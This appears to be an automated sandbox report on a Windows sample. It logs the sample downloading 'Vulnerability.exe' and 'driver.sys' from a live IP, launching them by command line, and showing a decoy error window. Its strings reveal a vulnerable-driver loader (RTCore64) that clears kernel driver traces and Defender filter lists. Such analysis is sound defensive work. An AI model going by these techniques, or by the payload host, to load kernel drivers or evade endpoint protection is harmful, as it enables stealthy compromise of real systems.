Oct 20, 2024 21:15:02.891629934 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.891643047 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:02.891649961 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.891689062 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.912327051 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:02.918220043 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:03.152214050 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:03.152292013 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:03.152371883 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:03.152409077 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:03.152504921 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:03.152506113 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:03.152915001 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:03.152950048 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:03.152961016 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:03.152995110 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:03.153681040 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:03.153714895 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:03.153729916 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:03.153757095 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:03.154524088 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:03.154560089 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:03.154581070 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:03.154608011 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:03.155447960 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:03.155504942 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:08.245130062 CEST	80	49704	185.101.104.122	192.168.2.5
Oct 20, 2024 21:15:08.245289087 CEST	49704	80	192.168.2.5	185.101.104.122
Oct 20, 2024 21:15:14.746350050 CEST	49710	443	192.168.2.5	172.67.72.57
Oct 20, 2024 21:15:14.746403933 CEST	443	49710	172.67.72.57	192.168.2.5
Oct 20, 2024 21:15:14.746484995 CEST	49710	443	192.168.2.5	172.67.72.57
Oct 20, 2024 21:15:14.759135962 CEST	49710	443	192.168.2.5	172.67.72.57
Oct 20, 2024 21:15:14.759149075 CEST	443	49710	172.67.72.57	192.168.2.5
Oct 20, 2024 21:15:15.562138081 CEST	443	49710	172.67.72.57	192.168.2.5
Oct 20, 2024 21:15:15.562238932 CEST	49710	443	192.168.2.5	172.67.72.57
Oct 20, 2024 21:15:17.508948088 CEST	49710	443	192.168.2.5	172.67.72.57
Oct 20, 2024 21:15:17.508976936 CEST	443	49710	172.67.72.57	192.168.2.5
Oct 20, 2024 21:15:17.509155989 CEST	49710	443	192.168.2.5	172.67.72.57
Oct 20, 2024 21:15:17.509649992 CEST	443	49710	172.67.72.57	192.168.2.5
Oct 20, 2024 21:15:17.509715080 CEST	49710	443	192.168.2.5	172.67.72.57
Oct 20, 2024 21:15:18.792479038 CEST	49704	80	192.168.2.5	185.101.104.122

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 20, 2024 21:15:14.733629942 CEST	61848	53	192.168.2.5	1.1.1.1
Oct 20, 2024 21:15:14.741652966 CEST	53	61848	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 20, 2024 21:15:14.733629942 CEST	192.168.2.5	1.1.1.1	0x4d71	Standard query (0)	keyauth.win	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 20, 2024 21:15:14.741652966 CEST	1.1.1.1	192.168.2.5	0x4d71	No error (0)	keyauth.win	172.67.72.57	A (IP address)	IN (0x0001)	false
Oct 20, 2024 21:15:14.741652966 CEST	1.1.1.1	192.168.2.5	0x4d71	No error (0)	keyauth.win	104.26.0.5	A (IP address)	IN (0x0001)	false
Oct 20, 2024 21:15:14.741652966 CEST	1.1.1.1	192.168.2.5	0x4d71	No error (0)	keyauth.win	104.26.1.5	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

185.101.104.122

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.101.104.122	80	1308	C:\Users\user\Desktop\Iyto7FYCJO.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:15:01.025322914 CEST	311	OUT	GET /Vulnerability.exe HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.101.104.122 Connection: Keep-Alive
Oct 20, 2024 21:15:02.424665928 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 20 Oct 2024 19:15:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 03 Oct 2024 17:41:18 GMT ETag: "23800-623960fde9891" Accept-Ranges: bytes Content-Length: 145408 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d e7 f2 38 39 86 9c 6b 39 86 9c 6b 39 86 9c 6b 30 fe 0f 6b 2f 86 9c 6b 3f 07 98 6a 33 86 9c 6b 3f 07 9f 6a 3d 86 9c 6b 3f 07 99 6a 1b 86 9c 6b 3f 07 9d 6a 3f 86 9c 6b 72 fe 9d 6a 28 86 9c 6b 39 86 9d 6b 31 87 9c 6b 56 07 95 6a 3e 86 9c 6b 56 07 63 6b 38 86 9c 6b 56 07 9e 6a 38 86 9c 6b 52 69 63 68 39 86 9c 6b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3e d7 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 4e 01 00 00 ee 00 00 00 00 00 00 b4 48 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 02 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$}89k9k9k0k/k?j3k?j=k?jk?j?krj(k9k1kVj>kVck8kVj8kRich9kPEd>f"&NH@p`P@0`p(p@`.textLN `.rdata`R@@.data0@.pdata0@$@@.rsrcP4@@.reloc`6@B
Oct 20, 2024 21:15:02.424912930 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: HL`3H%LT3HY+LD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHHU
Oct 20, 2024 21:15:02.424951077 CEST	1236	IN	Data Raw: 00 00 45 8b e6 42 0f b6 4c 08 03 c1 e1 08 8b d0 42 0f b6 44 08 02 0b c8 c1 e1 08 42 0f b6 44 0a 01 0b c8 42 0f b6 04 0a c1 e1 08 0b c8 42 0f b6 44 0a 06 89 4c 24 30 42 0f b6 4c 0a 07 c1 e1 08 0b c8 42 0f b6 44 0a 05 c1 e1 08 0b c8 42 0f b6 44 0a Data Ascii: EBLBDBDBBDL$0BLBDBDADL$4ALADADADL$8ALADADADL$<ALADADADL$@ALAD
Oct 20, 2024 21:15:02.425832987 CEST	636	IN	Data Raw: b6 8c 26 9c c1 01 00 8b d8 44 8b 44 94 30 41 83 c1 04 47 03 84 26 9c c0 01 00 49 83 c6 10 45 03 c2 44 03 c6 41 d3 c0 41 03 c0 41 83 f9 40 0f 82 c9 fd ff ff 8b b4 24 d8 00 00 00 44 03 ef 8b 6c 24 20 03 f0 8b 44 24 24 03 eb 44 8b a4 24 c8 00 00 00 Data Ascii: &DD0AG&IEDAAA@$Dl$ D$$D$@LL$(E$l$ D$D$$A;L$D$I7KH\$xAAD$AAD$AD$AD$AD$AD$AAD$AE,$AA
Oct 20, 2024 21:15:02.425867081 CEST	1236	IN	Data Raw: 0f 57 c9 f3 0f 7f 4c 24 40 41 8b ff 4c 89 7c 24 50 48 85 ed 74 72 48 b8 ff ff ff ff ff ff ff 7f 48 3b e8 0f 87 3c 02 00 00 48 81 fd 00 10 00 00 72 29 48 8d 4d 27 48 3b cd 0f 86 20 02 00 00 e8 15 25 01 00 48 85 c0 0f 84 7b 01 00 00 48 8d 58 27 48 Data Ascii: WL$@AL\|$PHtrHH;<Hr)HM'H; %H{HX'HHCH$HH\$@H<+H\|$PL3H2H\|$HH\$@LHH$EHHHcHHEDHHL$XD$XAL$hANfoD$hD$XH
Oct 20, 2024 21:15:02.426953077 CEST	1236	IN	Data Raw: 4d d0 33 d2 ff 15 5b 40 01 00 85 c0 0f 85 40 01 00 00 ff 15 ad 3f 01 00 3d b7 00 00 00 0f 84 2f 01 00 00 0f 57 c0 41 0f 11 07 4d 89 6f 10 4d 89 6f 18 45 33 c0 48 8d 15 02 49 01 00 49 8b cf e8 29 a9 00 00 90 48 8b 55 08 48 83 fa 0f 76 31 48 ff c2 Data Ascii: M3[@@?=/WAMoMoE3HII)HUHv1HHMHHrH'HIH+HHLmHEEHUHv1HHMHHrH'HIH+HHLmHEEIVHv0HIHr
Oct 20, 2024 21:15:02.426987886 CEST	1236	IN	Data Raw: 01 00 f3 0f 7f 44 24 60 c6 44 24 50 00 4c 8b 6d c0 49 8b c4 49 2b c5 48 83 f8 04 0f 82 32 16 00 00 4c 8d 4d b0 48 83 7d c8 0f 4c 0f 47 4d b0 4c 89 4c 24 40 0f 57 c0 0f 11 45 18 0f 57 c9 f3 0f 7f 4d 28 49 8d 55 04 bb 0f 00 00 00 4c 8d 65 18 8d 4b Data Ascii: D$`D$PLmII+H2LMH}LGMLL$@WEWM(IULeKIH;HHHH;v0HI@'H&HL`'IID$IULL$@>H;HBHKHrHA'H;nHtLIULL$@E3LeHU(H
Oct 20, 2024 21:15:02.428085089 CEST	1236	IN	Data Raw: ff 15 9f 3b 01 00 cc 48 8b cb e8 a6 15 01 00 90 48 8b 45 58 48 83 f8 0f 76 36 48 8d 50 01 49 8b c4 48 81 fa 00 10 00 00 72 1d 48 83 c2 27 4d 8b 64 24 f8 49 2b c4 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 5f 3b 01 00 cc 49 8b cc e8 66 15 01 00 90 48 8d Data Ascii: ;HHEXHv6HPIHrH'Md$I+HHv_;IfHLco<L3]AEdf;u-IHIETHD$pIUPHD$xC8Dc<ALf;MHHD$p<Q7IHD$xMeTIEPHD9
Oct 20, 2024 21:15:02.428118944 CEST	1236	IN	Data Raw: 83 f8 1f 0f 87 c1 09 00 00 e8 d3 10 01 00 48 89 5d 00 48 c7 45 08 0f 00 00 00 c6 45 f0 00 48 8b 55 e8 48 83 fa 0f 76 31 48 8b 4d d0 48 ff c2 48 8b c1 48 81 fa 00 10 00 00 72 19 48 8b 49 f8 48 2b c1 48 83 c2 27 48 83 c0 f8 48 83 f8 1f 0f 87 c4 09 Data Ascii: H]HEEHUHv1HMHHHrHIH+H'HHEHEH]IVHHHIrH'LAI+HAHI:I^IFAHMH}HGM03AH1IMAdH
Oct 20, 2024 21:15:02.428153038 CEST	1236	IN	Data Raw: 00 00 48 63 48 04 4c 8d 2d b8 8e 01 00 4c 89 ac 0d f0 01 00 00 48 8b 85 f0 01 00 00 48 63 48 04 8d 91 58 ff ff ff 89 94 0d ec 01 00 00 48 8d 8d f8 01 00 00 ff 15 93 2f 01 00 48 8d 05 34 55 01 00 48 89 85 f8 01 00 00 c6 85 74 02 00 00 00 c6 85 69 Data Ascii: HcHL-LHHcHXH/H4UHtiHZ/E3LxHAHlL`ED$HHmHu$HHcHHHE3AT$'-HHcHLHHcHXHH
Oct 20, 2024 21:15:02.431869030 CEST	1236	IN	Data Raw: f0 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 01 2d 01 00 cc e8 0b 07 01 00 48 89 5d 00 48 c7 45 08 0f 00 00 00 c6 45 f0 00 48 8b 55 e8 48 83 fa 0f 76 34 48 ff c2 48 8b 4d d0 48 8b c1 Data Ascii: HHrH'HIH+HHv-H]HEEHUHv4HHMHHrH'HIH+HHv,H]HEEIVHHIHH'LAI+HAH],2Y'WAI_I_E3H)0I
Oct 20, 2024 21:15:02.912327051 CEST	304	OUT	GET /driver.sys HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.101.104.122 Connection: Keep-Alive
Oct 20, 2024 21:15:03.152214050 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 20 Oct 2024 19:15:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 03 Oct 2024 19:27:48 GMT ETag: "2a00-623978cbb6377" Accept-Ranges: bytes Content-Length: 10752 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 41 b6 a6 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 54 20 d8 f5 1e 58 d9 f4 56 20 d8 f5 55 20 d9 f5 4e 20 d8 f5 1e 58 db f4 53 20 d8 f5 1e 58 dc f4 50 20 d8 f5 3a a1 dd f4 54 20 d8 f5 3a a1 da f4 54 20 d8 f5 52 69 63 68 55 20 d8 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 34 f0 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 18 00 00 00 0e 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 80 00 00 00 04 00 00 74 b0 00 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AU U U U T XV U N XS XP :T :T RichU PEd4f"&@t`A`(Pp$`28 1@0.text h.rdataP0@H.data@ @.pdataP"@HINIT`$ b.reloc$p(@B

Target ID:	0
Start time:	15:14:59
Start date:	20/10/2024
Path:	C:\Users\user\Desktop\Iyto7FYCJO.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Iyto7FYCJO.exe"
Imagebase:	0x7ff7a2710000
File size:	6'070'784 bytes
MD5 hash:	E12627A292CF6A7D32ADB932ADBD2B3B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:14:59
Start date:	20/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:15:04
Start date:	20/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c cd C:\
Imagebase:	0x7ff703a40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:15:04
Start date:	20/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Imagebase:	0x7ff703a40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:15:04
Start date:	20/10/2024
Path:	C:\Windows\Vulnerability.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Imagebase:	0x7ff7738e0000
File size:	145'408 bytes
MD5 hash:	8619AFEC8BD66B2C589FC987D7D0B194
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:15:04
Start date:	20/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:15:13
Start date:	20/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 \| find /i /v "md5" \| find /i /v "certutil"
Imagebase:	0x7ff703a40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:15:13
Start date:	20/10/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5
Imagebase:	0x7ff66f4f0000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:15:13
Start date:	20/10/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /i /v "md5"
Imagebase:	0x7ff7311b0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:15:13
Start date:	20/10/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /i /v "certutil"
Imagebase:	0x7ff7311b0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:15:16
Start date:	20/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Imagebase:	0x7ff703a40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:15:16
Start date:	20/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Imagebase:	0x7ff703a40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:15:16
Start date:	20/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:15:17
Start date:	20/10/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout /t 5
Imagebase:	0x7ff7b0ef0000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	15:15:17
Start date:	20/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 1308 -s 1708
Imagebase:	0x7ff75d680000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	15

Executed Functions

Function 00007FF7738E45E0 Relevance: 110.9, APIs: 36, Strings: 27, Instructions: 601
libraryfilethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7738E4626
LoadLibraryA.KERNEL32 ref: 00007FF7738E4633
_dupenv_s.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FF7738E4648
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E46ED
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7738E4710
SymFromName.DBGHELP ref: 00007FF7738E4819
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E4899
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E48C7
_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7738E48D4
GetCurrentThreadId.KERNEL32 ref: 00007FF7738E48DD
srand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7738E48E8
rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7738E4923
rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7738E4967
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E49E1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E4A21
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E4A5B
_wremove.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7738E4A74
memset.VCRUNTIME140 ref: 00007FF7738E4A89
?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z.MSVCP140 ref: 00007FF7738E4ABD
??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738E4ACD
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738E4B04
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738E4B49
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E4B86
_wremove.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7738E4B9A
CreateFileW.KERNEL32 ref: 00007FF7738E4BCC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E4E6F

Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECAC9

Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F32F3
Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3310
Part of subcall function 00007FF7738F32C0: VirtualAlloc.KERNEL32 ref: 00007FF7738F3326
Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F3341
Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3362

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E4C59

Part of subcall function 00007FF7738E7EA0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E7F38
Part of subcall function 00007FF7738E7EA0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E8970

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E4CE7
DeviceIoControl.KERNEL32 ref: 00007FF7738E4DBB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E4EB5
SymUnloadModule64.DBGHELP ref: 00007FF7738E4EE1
SymCleanup.DBGHELP ref: 00007FF7738E4EEB
CloseHandle.KERNEL32 ref: 00007FF7738E4EF5
CloseHandle.KERNEL32 ref: 00007FF7738E4EFF

Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E4F7E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E4FCD

Strings

[-] Failed to Load Symbol of NtUserSetGestureConfig, xrefs: 00007FF7738E48AA
[-] Failed to ClearPiDDBCacheTable, xrefs: 00007FF7738E4DF8
ntoskrnl.exe, xrefs: 00007FF7738E4C02
[-] Failed to create vulnerable driver file, xrefs: 00007FF7738E4B17
https://msdl.microsoft.com/download/symbols, xrefs: 00007FF7738E4751
\\.\RTCore64, xrefs: 00007FF7738E4BC5
[!] Failed to ClearWdFilterDriverList, xrefs: 00007FF7738E4E38
NtUserSetGestureConfig, xrefs: 00007FF7738E47B4
\System32\win32k.sys, xrefs: 00007FF7738E468A
[!] Failed to ClearMmUnloadedDrivers, xrefs: 00007FF7738E4E26
gfff, xrefs: 00007FF7738E492C
xxx, xrefs: 00007FF7738E4D16
[-] Failed to register and start service for the vulnerable driver, xrefs: 00007FF7738E4B69
[-] Failed to load driver rtcore64.sys, xrefs: 00007FF7738E4BDF
0, xrefs: 00007FF7738E4D94
win32u.dll, xrefs: 00007FF7738E462C
[-] Failed to get ntoskrnl.exe, xrefs: 00007FF7738E4C71
[<] Loading vulnerable driver, Name: , xrefs: 00007FF7738E499D
[-] NtUserSetGestureConfig not found, xrefs: 00007FF7738E4E52
